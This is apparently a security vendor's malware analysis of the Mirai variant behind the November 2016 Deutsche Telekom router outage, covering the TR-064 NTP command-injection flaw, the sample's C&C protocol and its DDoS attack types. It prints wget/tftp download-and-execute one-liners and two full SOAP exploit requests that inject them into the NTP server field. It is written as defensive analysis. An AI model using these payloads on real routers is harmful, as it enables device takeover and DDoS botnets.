German Internet Outage on November 27 Technical Analysis and Solution

On November 27 (Sunday), at around 17:00 (local time), Deutsche Telekom was hit by a cyberattack, resulting in more than 900,000 routers getting disconnected, as confirmed by the company. The outage lasted several hours. Later, the problems continued on Monday morning from 08:00. Besides network access, the affected routers are used by Deutsche Telekom customers for fixed telephony and TV services.


According to information disclosed so far, a variant of Mirai was suspected to cause the attack because the same code as Mirai was found in the sample. But unlike Mirai, which propagated over ports 23 and 2323, the sample used in this attack performed scans via port 7547. Following is a detailed analysis of samples we captured that are similar to the one used in this attack.

Mirai Attack History

Figure 1 Timeline of attacks from the Mirai botne


Propagation and Infection

The sample launched an attack by exploiting a common vulnerability in TR-069 and TR-064 over port 7547 of routers. By sending a packet containing the busybox iptables -I INPUT -p tcp –dport 80 -j ACCEPT command to port 7547, the attacker had BusyBox execute this command to open port 80 of the firewall. This made it possible for the attacker to remotely access the network management interface.

Vulnerability Analysis

This attack targeted routers of Deutsche Telekom, disconnecting users from the Internet. The major cause of the attack was the improper port configuration. The attacked routers allocated port 7547 to the TR-069 protocol (standing for CPE WAN Management Protocol) by default for remote management of devices by Internet service providers (ISPs). As a result, port 7547 was open to the Internet.

However, in the Eir D1000 modem, port 7547 was also used by the TR-064 protocol (LAN-Side CPE Configuration). This protocol allows ISPs to install software on routers, but is not for use on the WAN side of routers. When the two services work simultaneously, a fault will occur. This vulnerability was first disclosed on November 7, 2016.

In the technical report of TR-064, we find that the TR-064 service allows configuration of an NTP/SNTP time client in the CPE.

Figure 2 Related section in the technical report of TR-064

Unfortunately, TR-064 is prone to a command injection vulnerability in the configuration of the NTP time service. By sending a packet containing the busybox iptables -I INPUT -p tcp –dport 80 -j ACCEPT command to port 7547, an attacker can have BusyBox execute the command to open port 80. This makes it possible for the attacker to remotely access the network management interface.

Figure 3 A section of the PoC code

As the D1000 modem uses the default Wi-Fi password for login by default, it is easy to obtain this password and log in to the device, hence the remote download of the sample and completion of the attack.

Figure 4 Obtaining the password

Figure 5 Attack code

The following figure shows another similar attack sample we captured.

cd /tmp;wget hxxp://;chmod 777;./

<NewNTPServer1>`cd /tmp;tftp -l 3 -r 1 -g;chmod 777 3;./3`</NewNTPServer1>

<NewNTPServer1>`cd /tmp;wget;chmod 777 1;./1`</NewNTPServer1>

cd /tmp;wget hxxp://;chmod 777 1;./1

From these attack commands, we can find that the attacker mainly intended to have the target hosts download the malware from the specified domain and then execute it, thus completing the attack. We have noticed a domain name “”, which can easily be confused with “localhost”. The attacker fabricated such a domain name obviously for the purpose of misleading users.

Sample Analysis

File Information

Figure 6 File information

Sample Execution Flow Chart

Figure 7 Attack procedure


  • DDoS attack: By controlling the current router, the sample has a DDoS command executed via UDP, VSE, DNS, or SYN.
  • Vulnerability exploitation: The sample enters the target machine by exploiting a common vulnerability in TR-064 and TR-069.
  • Network behaviors: The sample requests connection to a forged IP address and then to the IP address ( of a server controlled by the hacker, which represents the domain of When scanning a network, the sample will send a flood of request packets.

Detailed Analysis

First, the sample sets the signal processing method.

Figure 8 Setting the signal processing method

Then the sample attempts to connect to the IP address and calls the getsockname function to obtain the IP address and port number of the current host.

Figure 9 Obtaining the IP address and port number of the current host

Subsequently, the function address is stored in the structure body.

Figure 10 Stored function address

Functions in the preceding figure are described in the following table.

Custom Function Description
ensure_single_instance_F2C8 Ensures that only one instance is running.
table_unlock_val_12D28 Retrieves the value corresponding to the index ID from the table and decrypts it.
table_retrieve_val_12C18 Retrieves the value corresponding to the index ID from the table.
table_init_12DFC Initializes arrays in the table.
table_lock_val_12C58 Encrypts the value in the table corresponding to the index ID.
util_memcpy_13884 Copies data.
util_strcmp_13BE8 Compares data.
killer_init_EB00 Closes port 7547 and kills processes running on this port.
anti_gdb_entry_F2A4 Sets a pointer to the function that parses the IP address of the C&C server.

The following figure shows a section of code about the involved encryption algorithm.

Figure 11 Encryption and decryption code

The sample calls the table_init_12DFC function to initialize strings, which are mainly key strings to be used subsequently. The strings are encrypted before being stored. The following table compares the decrypted strings with the macros in the original Mirai code (the sequence of data is the same as that in the sample, but different from the original code).

Macro Decrypted String
TABLE_SCAN_KILL_9 /bin/busybox kill -9
TABLE_SCAN_PS /bin/busybox ps
TABLE_ATK_KEEP_ALIVE Connection: keep-alive
TABLE_SCAN_PS /bin/busybox ps

Now the sample binds the socket to port 80 and connects to a forged IP address for the purpose of confusing users.

Figure 12 Request for a fake domain

Then the sample hides itself.

Figure 13 Hiding itself

After the preceding actions, the sample will initiate the attack procedure, process killing procedure, and scanning procedure.

  • Attack procedure initialization

The sample sets the attack function list to bind macros and function addresses.

Figure 14 Setting the attack function list

Mappings between attack functions and attack types are as follows:

Attack Function Attack Type
ATK_VEC_UDP Straight up UDP flood
ATK_VEC_VSE Valve Source Engine query flood
ATK_VEC_DNS DNS water torture
ATK_VEC_STOMP ACK flood to bypass mitigation devices
ATK_VEC_GREETH GRE Ethernet flood
ATK_VEC_HTTP HTTP layer 7 flood
  • Process killing procedure

The sample runs the iptables –A INPUT –p –tcp –destination-port 7547 –j DROP command via BusyBox to close port 7547 to prevent other similar samples from exploiting this vulnerability to launch attacks. Then, this sample searches for the process using port 31517 and terminate it. After that, the sample binds port 31517 with the socket and listens for this port.

Figure 15 Closing port 31517

  • Scanning procedure initialization

The sample sets the IP header and constructs the entire packet header.

Figure 16 Constructing the entire packet header

The samples adds weak passwords.

Figure 17 Adding weak passwords

The sample adds an IP address randomly.

Figure 18 Obtaining the IP address generated randomly

The sample checks whether the generated IP address is a sensitive one, for example, an IP address belonging to the Federal Bureau of Investigation (FBI). If yes, the sample regenerates one. The following table lists various types of IP addresses and their usage.

IP Address Description Loopback Invalid address space General Electric Company Hewlett-Packard Company US Postal Service Internal network Internal network Internal network IANA NAT reserved IANA NAT reserved IANA Special use
224.*.*.*+ Multicast

The sample scans the generated IP address and sends a packet to port 31517 to check whether this IP address is infected. If not, the sample sends a packet that contains attack code to the target host.

Figure 19 Sending vulnerability exploit code

The two packets are stored in an encrypted format. The contents of decrypted packets are as follows:

The following is the packet with a 746-byte body:


User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)

SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers

Content-Type: text/xml

Content-Length: 534

<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="" SOAP-ENV:encodingStyle=""> <SOAP-ENV:Body>   <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">   <NewNTPServer1>`cd /tmp;wget;chmod 777;./`</NewNTPServer1>     <NewNTPServer2></NewNTPServer2>   <NewNTPServer3></NewNTPServer3>     <NewNTPServer4></NewNTPServer4>     <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope>

The following is the packet with a 756-byte body:

POST /UD/act?1 HTTP/1.1


User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)

SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers

Content-Type: text/xml

Content-Length: 544

<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="" SOAP-ENV:encodingStyle=""> <SOAP-ENV:Body>   <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">   <NewNTPServer1>`cd /tmp;tftp -l -r -g;chmod 777;./`</NewNTPServer1> <NewNTPServer2></NewNTPServer2>     <NewNTPServer3></NewNTPServer3>     <NewNTPServer4></NewNTPServer4>   <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope>

After the preceding procedures, return to the main process: First, search the embedded server list for the IP address and port of the C&C server. Then try to connect to the C&C server. If the connection succeeds, return the IP address and port of the server.

Figure 20 Parsing the IP address of the C&C server

The sample constructs a DNS request header:

Figure 21 Constructing a DNS request header

The port number is parsed as follows:

Figure 22 Parsing the port number of the C&C server

The sample initiates a connection to the C&C server:

Figure 23 Connecting to the server.

The sample checks whether another instance exists. If yes, the current instance stops itself.

Figure 24 Checking for another instance

The sample sends a go-live packet with the content of \x00\x00\x00\x01.

Figure 25 Sending a go-live packet

The sample receives the data returned by the server. If the recv_15F88 function fails to be invoked, the sample closes the connection.

Figure 26 Receiving data from the server

Then the sample continues to receive data. If instruction data arrives, the sample parses the received packet.

Figure 27 Receiving instruction data

The sample parses the received packet. The first six bytes of the packet indicate the attack duration, attack method, and number of attack targets (maximum: 255).

Figure 28 Parsing packet 1

The last 21 bytes constitute a structure that contains attack target information. After zero padding and alignment, this structure becomes 24 bytes as follows:

Figure 29 Parsing packet 2

All attack targets are parsed as follows:

Figure 30 Parsing attack targets

Attack options are parsed as follows:

Figure 31 Parsing attack options

Attack options are listed as follows:

Macros for Custom Functions Description
ATK_OPT_PAYLOAD_SIZE What should the size of the packet data be
ATK_OPT_PAYLOAD_RAND Should we randomize the packet data contents
ATK_OPT_IP_TOS tos field in IP header
ATK_OPT_IP_IDENT ident field in IP header
ATK_OPT_IP_TTL ttl field in IP header
ATK_OPT_IP_DF Dont-Fragment bit set
ATK_OPT_SPORT Should we force a source port? (0 = random)
ATK_OPT_DPORT Should we force a dest port? (0 = random)
ATK_OPT_DOMAIN Domain name for DNS attack
ATK_OPT_DNS_HDR_ID Domain name header ID
ATK_OPT_URG TCP URG header flag
ATK_OPT_ACK TCP ACK header flag
ATK_OPT_PSH TCP PSH header flag
ATK_OPT_RST TCP RST header flag
ATK_OPT_SYN TCP SYN header flag
ATK_OPT_FIN TCP FIN header flag
ATK_OPT_SEQRND Should we force the sequence number? (TCP only)
ATK_OPT_ACKRND Should we force the ack number? (TCP only)
ATK_OPT_GRE_CONSTIP Should the encapsulated destination address be the same as the target?
ATK_OPT_METHOD Method for HTTP flood
ATK_OPT_POST_DATA Any data to be posted with HTTP flood
ATK_OPT_PATH The path for the HTTP flood
ATK_OPT_CONNS Number of sockets to use

Different functions are invoked to implement different types of attacks:

Figure 32 Selecting attack functions

Launch Mode

By sending port 7547 a packet that contains the busybox iptables -I INPUT -p tcp –dport 80 -j ACCEPT command, the attacker had this command executed, thus opening port 80 on the firewall. This makes it possible for the attacker to access the network management interface remotely and embed attack code.

Attack Location

By tracking network behaviors of this sample, we find that the attack source IP address,, is in the St. Petersburg city of Russia.

Figure 33 Attack location

Areas of Impact

Figure 34 Affected areas (the image is from media)


The attack principle is as follows: The TR-069 protocol for WANs exposes port 7547 externally, while TR-064 for LANs happens to also use this port. This allows an attacker to send TR-064 commands to port 7547, instructing the target to download malicious files from a designated address and then execute them. After the execution of malicious files, port 7547 will be closed, preventing the ISP from using this port to connect to the device for upgrade. Currently, the main purpose for hackers to control devices is to launch DDoS attacks, consuming a large proportion of bandwidth and affecting the normal running of devices.

Recommended Solutions

Detection Method

  • Check whether port 31517 is open on the current router.
  • Check whether port 7547 is closed on the current router.

Malware Clearing Method

First shut down the device and then restart it 15 minutes later.

NSFOCUS Detection Services

  • NSFOCUS engineers provide onsite detection services.
  • NSFOCUS provides online cloud detection services. You can visit the following link to apply for the trial use of NSFOCUS Threat Intelligence (NTI):

NSFOCUS Solution for Removing Trojans

  • Short-term service: NSFOCUS engineers provide the onsite trojan backdoor removal service (manual services + NIPS + TAC) to ensure that risk points are immediately eliminated in the network and the event impact is minimized. After the handling, an event analysis report is provided.
  • Mid-term service: NSFOCUS provides 3- to 6-month risk monitoring and preventive maintenance inspection (PMI) services (NIPS + TAC + manual services) to eradicate risks and prevent events from recurring.
  • Long-term service: NSFOCUS provides industry-specific risk mitigation solutions (threat intelligence + attack traceback + professional security service).

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